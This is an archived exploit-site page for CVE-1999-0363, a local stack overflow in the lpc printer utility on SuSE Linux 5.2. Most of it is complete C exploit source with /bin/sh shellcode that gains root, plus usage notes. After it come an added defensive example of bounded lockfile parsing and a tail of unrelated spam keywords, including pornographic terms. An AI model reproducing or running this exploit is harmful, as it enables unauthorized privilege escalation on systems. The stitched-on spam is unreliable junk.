

Title           S.u.S.E. 5.2 lpc Vulnerability
Published       1999-02-03-12:00AM
Updated         1999-06-01-12:00AM
Class           Boundary Condition Error
CVE             CVE-1999-0363
Remote          No
Local           Yes
Credit          First posted to BugTraq by xnec <xnec@INFERNO.TUSCULUM.EDU> on Feb 3, 1999.
Vulnerable      S.u.S.E. Linux 5.2
Not Vulnerable  S.u.S.E. Linux 5.1
                S.u.S.E. Linux 5.0
Code

/*
   Standard overflow for x86 linux lpc.
   PLP Line Printer Control program, version 4.0.3.
   Tested on SuSE 5.2 (suidroot).

   Test your copy of /usr/bin/lpc by trying an
     /usr/bin/lpc attach lp `perl -e "print 'A' x 1000"`;lpc status lp

   The problematic code is in displayq.c and control_ops.c, where we
   attempt to fscanf() the lockfile's contents into a fixed length buffer.
   See the Bugtraq post for full fix information (www.geek-girl.com/bugtraq).

   The buffer we're overflowing is 256 bytes, and an offset of 0 works
   just fine. Try in increments of +-100 if it doesn't work for you.

   Obviously this is a complete rip of Aleph1's standard overflow program
   from his paper "smashing the stack for fun and profit".

   to compile: gcc -o xnec_lpc xnec_lpc.c

   bugs: only sets uid=0, and you may have to have a printer defined
   (lp on my box).

   greets to #sk1llz

   -xnec
   xnec on EF and DALnet, xnec@inferno.tusculum.edu
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 356
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char pause;

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer (value is left in %eax). */
unsigned long get_esp(void) {
  __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%lx\n", addr);
  printf("\nPLP Line Printer Control program, version 4.0.3 overflow.\n");
  printf("Bug found by xnec, code ripped from Aleph1.\n"
         "After running this program, simply compile and run:\n---\n"
         "#include <unistd.h>\n"
         "void main(){system(\"/bin/bash\");}\n---\n");

  /* wait for a keypress before continuing */
  scanf("%c", &pause);

  /* fill buff with the guessed address */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* fill egg with NOPs followed by the shellcode */
  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  /* export both buffers as environment variables */
  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);

  system("`which lpc` attach lp $RET; `which lpc` status lp");
  return 0;
}
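
The comment above attributes the bug to an fscanf() of the lockfile's contents into a fixed 256-byte buffer. As an added example (not PLP source and not part of xnec's post), the following shows a bounded read that rejects over-long fields instead of overflowing or truncating; the function names, the single-token lockfile layout and the constructed test input are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define FIELD_MAX 256   /* buffer size given in the exploit's comment */

/* Unsafe pattern, for contrast only (not compiled):
 *     char field[FIELD_MAX];
 *     fscanf(fp, "%s", field);    no width: writes until whitespace or EOF */

/* Read one whitespace-delimited token into out (FIELD_MAX bytes).
 * Returns 0 on success, -1 if no token is present or it would not fit. */
int read_lock_field(FILE *fp, char *out)
{
    int c;
    out[0] = '\0';
    if (fscanf(fp, "%255s", out) != 1)   /* width is FIELD_MAX - 1 */
        return -1;
    c = fgetc(fp);                       /* what ended the conversion? */
    if (c != EOF && !isspace(c)) {
        out[0] = '\0';                   /* over-long: reject, do not truncate */
        return -1;
    }
    return 0;
}

/* Constructed input: len copies of fill plus a newline, in a temp file standing
 * in for the lockfile. Returns the accepted token length, or -1 if rejected. */
int parse_constructed_lockfile(char fill, size_t len)
{
    char field[FIELD_MAX];
    FILE *fp = tmpfile();
    size_t i;
    int rc;
    if (fp == NULL)
        return -1;
    for (i = 0; i < len; i++)
        fputc(fill, fp);
    fputc('\n', fp);
    rewind(fp);
    rc = read_lock_field(fp, field);
    fclose(fp);
    return rc == 0 ? (int)strlen(field) : -1;
}

int main(void)
{
    printf("8 bytes -> %d, 1000 bytes -> %d\n", parse_constructed_lockfile('A', 8), parse_constructed_lockfile('A', 1000));
    return 0;
}
```

The 1000-byte case mirrors the `perl -e "print 'A' x 1000"` check quoted in the comment: with the width limit and the trailing-character check, that input is rejected rather than written past the buffer.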
Copyright 2007, SecurityDot
Thu, 17 Dec 2009 15:04:23 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.Sixy18 steal cook www.bayued t538t www.iltale free sex v Searching www.humoro maxcpm.inf dmoz.im admdog mambo Remo www.humoro xNxx+ mvs maxcpm.inf maxcpm.inf Narutothem Www sax co www.zhangf http://hot maxcpm.inf www.blacks Foto bugil maxcpm.inf wwww.bebo. film porno mvs open sex w film porno Www.Sexygi wwww.bebo. t971t punbb shakilablu FTP exploi Crack Data Indian se fotos sex Crack Data Kajol fuck www.xNxx.c maxcpm.inf western+un www.xlxx www.xNxx.c sexgirls Free Downl imail smtp taobaodx.c